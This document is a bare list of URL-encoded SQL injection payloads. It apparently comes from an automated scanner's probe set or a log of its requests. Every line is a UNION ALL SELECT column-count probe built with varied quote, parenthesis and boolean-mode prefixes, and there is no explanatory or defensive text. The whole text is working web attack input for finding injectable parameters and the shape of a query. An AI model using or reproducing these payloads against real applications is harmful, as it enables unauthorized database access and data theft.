foo%27%7C%7C%28SELECT%20%27aFpA%27%20FROM%20DUAL%20WHERE%202979%3D2979%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27kFHh%27%20FROM%20DUAL%20WHERE%203270%3D3270%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27pjQS%27%20FROM%20DUAL%20WHERE%208875%3D8875%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27UIqM%27%20FROM%20DUAL%20WHERE%208767%3D8767%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27IXdi%27%20FROM%20DUAL%20WHERE%202401%3D2401%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27nHso%27%20FROM%20DUAL%20WHERE%206680%3D6680%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27WZbM%27%20FROM%20DUAL%20WHERE%208272%3D8272%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27Etpl%27%20WHERE%206069%3D6069%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27acez%27%20WHERE%202552%3D2552%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27Bllk%27%20WHERE%209521%3D9521%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27bukb%27%20WHERE%202258%3D2258%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27mcoO%27%20WHERE%204869%3D4869%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27WkPK%27%20WHERE%206041%3D6041%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27qqqG%27%20WHERE%202411%3D2411%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27eGou%27%20WHERE%209790%3D9790%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27pBst%27%20WHERE%207649%3D7649%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27QFve%27%20WHERE%207614%3D7614%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20AXvN%20WHERE%208751%3D8751%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20mZHs%20WHERE%209733%3D9733%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20cgHg%20WHERE%201848%3D1848%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20RDen%20WHERE%207868%3D7868%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20AAss%20WHERE%209538%3D9538%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20jknc%20WHERE%208351%3D8351%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20BkJG%20WHERE%203668%3D3668%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20xIsC%20WHERE%201800%3D1800%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20rdUi%20WHERE%203050%3D3050%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20QmKC%20WHERE%202223%3D2223%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27LtQY%27%20WHERE%209364%3D9364%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27WYhh%27%20WHERE%203814%3D3814%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27uqzk%27%20WHERE%204420%3D4420%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27Oqig%27%20WHERE%201256%3D1256%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27aBmJ%27%20WHERE%201738%3D1738%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27hBvW%27%20WHERE%204881%3D4881%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27ORwu%27%20WHERE%208935%3D8935%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27LEmT%27%20WHERE%204844%3D4844%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27ukKs%27%20WHERE%204551%3D4551%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27RJzJ%27%20WHERE%205561%3D5561%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -3787%29%20UNION%20ALL%20SELECT%209442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%23 -5362%29%20UNION%20ALL%20SELECT%202382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%23 -3335%29%20UNION%20ALL%20SELECT%206576%2C6576%2C6576%2C6576%2C6576%2C6576%2C6576%2C6576%2C6576%2C6576%2C6576%2C6576%2C6576%23 -4273%29%20UNION%20ALL%20SELECT%204181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%2C4181%23 -1034%29%20UNION%20ALL%20SELECT%204125%2C4125%2C4125%2C4125%2C4125%2C4125%2C4125%2C4125%2C4125%2C4125%2C4125%2C4125%2C4125%2C4125%2C4125%23 -1663%29%20UNION%20ALL%20SELECT%208306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%23 -5447%29%20UNION%20ALL%20SELECT%209199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%2C9199%23 -3090%29%20UNION%20ALL%20SELECT%201404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%23 -2093%29%20UNION%20ALL%20SELECT%205288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%2C5288%23 -8076%29%20UNION%20ALL%20SELECT%209785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%23 -8576%27%29%20UNION%20ALL%20SELECT%204147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%2C4147%23 -3723%27%29%20UNION%20ALL%20SELECT%206270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%2C6270%23 -8482%27%29%20UNION%20ALL%20SELECT%201403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%23 -2772%27%29%20UNION%20ALL%20SELECT%205133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%2C5133%23 -6428%27%29%20UNION%20ALL%20SELECT%201758%2C1758%2C1758%2C1758%2C1758%2C1758%2C1758%2C1758%2C1758%2C1758%2C1758%2C1758%2C1758%2C1758%2C1758%23 -2732%27%29%20UNION%20ALL%20SELECT%204527%2C4527%2C4527%2C4527%2C4527%2C4527%2C4527%2C4527%2C4527%2C4527%2C4527%2C4527%2C4527%2C4527%2C4527%2C4527%23 -6190%27%29%20UNION%20ALL%20SELECT%205087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%2C5087%23 -2330%27%29%20UNION%20ALL%20SELECT%203969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%2C3969%23 -7964%27%29%20UNION%20ALL%20SELECT%204241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%2C4241%23 -2658%27%29%20UNION%20ALL%20SELECT%203939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%23 -3661%27%20UNION%20ALL%20SELECT%206047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%23 -8041%27%20UNION%20ALL%20SELECT%202138%2C2138%2C2138%2C2138%2C2138%2C2138%2C2138%2C2138%2C2138%2C2138%2C2138%2C2138%23 -8773%27%20UNION%20ALL%20SELECT%201211%2C1211%2C1211%2C1211%2C1211%2C1211%2C1211%2C1211%2C1211%2C1211%2C1211%2C1211%2C1211%23 -1186%27%20UNION%20ALL%20SELECT%209602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%23 -8491%27%20UNION%20ALL%20SELECT%201205%2C1205%2C1205%2C1205%2C1205%2C1205%2C1205%2C1205%2C1205%2C1205%2C1205%2C1205%2C1205%2C1205%2C1205%23 -7092%27%20UNION%20ALL%20SELECT%201607%2C1607%2C1607%2C1607%2C1607%2C1607%2C1607%2C1607%2C1607%2C1607%2C1607%2C1607%2C1607%2C1607%2C1607%2C1607%23 -2449%27%20UNION%20ALL%20SELECT%209813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%23 -7213%27%20UNION%20ALL%20SELECT%206992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%2C6992%23 -9217%27%20UNION%20ALL%20SELECT%207241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%2C7241%23 -7205%27%20UNION%20ALL%20SELECT%203358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%2C3358%23 -2152%22%20UNION%20ALL%20SELECT%202502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%23 -5835%22%20UNION%20ALL%20SELECT%206625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%23 -8971%22%20UNION%20ALL%20SELECT%206985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%2C6985%23 -7065%22%20UNION%20ALL%20SELECT%209436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%23 -2222%22%20UNION%20ALL%20SELECT%208620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%23 -7167%22%20UNION%20ALL%20SELECT%202135%2C2135%2C2135%2C2135%2C2135%2C2135%2C2135%2C2135%2C2135%2C2135%2C2135%2C2135%2C2135%2C2135%2C2135%2C2135%23 -2105%22%20UNION%20ALL%20SELECT%206780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%2C6780%23 -8708%22%20UNION%20ALL%20SELECT%203881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%2C3881%23 -5769%22%20UNION%20ALL%20SELECT%202750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%23 -1926%22%20UNION%20ALL%20SELECT%209373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%23 -6890%29%20UNION%20ALL%20SELECT%206080%2C6080%2C6080%2C6080%2C6080%2C6080%2C6080%2C6080%2C6080%2C6080%2C6080%23 -6604%29%20UNION%20ALL%20SELECT%201007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%23 -1855%29%20UNION%20ALL%20SELECT%205945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%2C5945%23 -2228%29%20UNION%20ALL%20SELECT%208894%2C8894%2C8894%2C8894%2C8894%2C8894%2C8894%2C8894%2C8894%2C8894%2C8894%2C8894%2C8894%2C8894%23 -8975%29%20UNION%20ALL%20SELECT%207600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%23 -2817%29%20UNION%20ALL%20SELECT%206497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%2C6497%23 -2252%29%20UNION%20ALL%20SELECT%208823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%2C8823%23 -2542%29%20UNION%20ALL%20SELECT%205530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%23 -8451%29%20UNION%20ALL%20SELECT%208891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%2C8891%23 -1841%29%20UNION%20ALL%20SELECT%206786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%2C6786%23 -4860%29%29%20UNION%20ALL%20SELECT%209021%2C9021%2C9021%2C9021%2C9021%2C9021%2C9021%2C9021%2C9021%2C9021%2C9021%23 -6984%29%29%20UNION%20ALL%20SELECT%208360%2C8360%2C8360%2C8360%2C8360%2C8360%2C8360%2C8360%2C8360%2C8360%2C8360%2C8360%23 -1333%29%29%20UNION%20ALL%20SELECT%205306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%23 -6457%29%29%20UNION%20ALL%20SELECT%201734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%23 -5970%29%29%20UNION%20ALL%20SELECT%208195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%23 -1298%29%29%20UNION%20ALL%20SELECT%205795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%23 -5372%29%29%20UNION%20ALL%20SELECT%208267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%23 -8755%29%29%20UNION%20ALL%20SELECT%205429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%2C5429%23 -7365%29%29%20UNION%20ALL%20SELECT%202277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%23 -6128%29%29%20UNION%20ALL%20SELECT%208629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%2C8629%23 -9652%29%29%29%20UNION%20ALL%20SELECT%201112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%23 -9057%29%29%29%20UNION%20ALL%20SELECT%209342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%23 -1837%29%29%29%20UNION%20ALL%20SELECT%205398%2C5398%2C5398%2C5398%2C5398%2C5398%2C5398%2C5398%2C5398%2C5398%2C5398%2C5398%2C5398%23 -9941%29%29%29%20UNION%20ALL%20SELECT%209587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%2C9587%23 -9756%29%29%29%20UNION%20ALL%20SELECT%204618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%2C4618%23 -9791%29%29%29%20UNION%20ALL%20SELECT%207749%2C7749%2C7749%2C7749%2C7749%2C7749%2C7749%2C7749%2C7749%2C7749%2C7749%2C7749%2C7749%2C7749%2C7749%2C7749%23 -4114%29%29%29%20UNION%20ALL%20SELECT%207304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%2C7304%23 -2730%29%29%29%20UNION%20ALL%20SELECT%205027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%2C5027%23 -9951%29%29%29%20UNION%20ALL%20SELECT%201700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%23 -6527%29%29%29%20UNION%20ALL%20SELECT%202432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%2C2432%23 -8394%20UNION%20ALL%20SELECT%202884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%23 -6494%20UNION%20ALL%20SELECT%205118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%2C5118%23 -8036%20UNION%20ALL%20SELECT%206668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%2C6668%23 -7773%20UNION%20ALL%20SELECT%202930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%23 -1439%20UNION%20ALL%20SELECT%202955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%23 -1124%20UNION%20ALL%20SELECT%208938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%23 -4756%20UNION%20ALL%20SELECT%208216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%2C8216%23 -9008%20UNION%20ALL%20SELECT%203914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%23 -3917%20UNION%20ALL%20SELECT%203276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%2C3276%23 -4601%20UNION%20ALL%20SELECT%205331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%23 